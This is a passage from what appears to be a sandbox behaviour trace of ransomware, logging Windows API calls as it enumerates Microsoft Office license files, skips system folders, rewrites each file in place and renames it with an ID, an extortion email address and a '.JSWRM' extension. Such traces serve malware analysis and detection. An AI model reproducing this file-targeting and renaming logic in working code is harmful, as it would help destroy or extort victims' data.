Office\\root\\Licenses16\\WordR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0112.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0112.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0112.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0112.121] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0112.121] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeceea379, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeceea379, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed041918, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5110, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="WO362B~1.XRM")) returned 1 [0112.121] lstrcmpiW (lpString1="WordR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0112.122] lstrcmpiW (lpString1="WordR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0112.122] lstrcmpiW (lpString1="WordR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0112.122] lstrcmpiW (lpString1="WordR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned 1 [0112.122] lstrcmpiW (lpString1="WordR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned 1 [0112.122] lstrcmpiW (lpString1="WordR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned 1 [0112.122] lstrcmpiW (lpString1="WordR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0112.122] lstrcmpiW (lpString1="WordR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.122] lstrcmpiW (lpString1="WordR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned 1 [0112.122] lstrcmpiW (lpString1="WordR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned 1 [0112.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0112.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0112.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0112.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241358, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0112.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0112.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0112.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0112.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0112.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x240f70, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0112.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0112.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0112.122] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0112.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.122] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.122] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0112.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.123] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20752) returned 1 [0112.123] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5110) returned 0x24c1d0 [0112.123] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5110, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5110, lpOverlapped=0x0) returned 1 [0112.126] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.126] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5110, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5110, lpOverlapped=0x0) returned 1 [0112.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.126] CloseHandle (hObject=0x45c) returned 1 [0112.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0112.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0112.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0112.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0112.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0112.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0112.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.127] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0112.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0112.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0112.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0112.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0112.128] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeceea379, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeceea379, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed12666a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d39, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="WO09F0~1.XRM")) returned 1 [0112.128] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0112.128] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0112.128] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0112.128] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned 1 [0112.128] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0112.128] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0112.128] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0112.128] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.128] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0112.128] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0112.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0112.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0112.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0112.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0112.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0112.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0112.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2411c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0112.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0112.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0112.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0112.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0112.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.129] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11577) returned 1 [0112.129] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d30) returned 0x24c1d0 [0112.129] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d30, lpOverlapped=0x0) returned 1 [0112.132] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.132] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d30, lpOverlapped=0x0) returned 1 [0112.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.132] CloseHandle (hObject=0x45c) returned 1 [0112.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0112.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0112.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0112.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.132] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0112.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0112.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0112.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0112.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0112.133] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0112.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0112.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0112.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0112.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0112.134] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xece77c56, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xece77c56, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xecfcf13b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dd2, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="WOB814~1.XRM")) returned 1 [0112.134] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0112.134] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0112.134] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0112.134] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned 1 [0112.134] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0112.134] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0112.134] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0112.134] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.134] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned 1 [0112.134] lstrcmpiW (lpString1="WordR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0112.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0112.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0112.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x240fc0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0112.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0112.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0112.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0112.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0112.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2411c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0112.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0112.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0112.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0112.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0112.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.135] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19922) returned 1 [0112.135] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24c1d0 [0112.135] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4dd0, lpOverlapped=0x0) returned 1 [0112.143] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.144] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4dd0, lpOverlapped=0x0) returned 1 [0112.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.144] CloseHandle (hObject=0x45c) returned 1 [0112.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0112.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 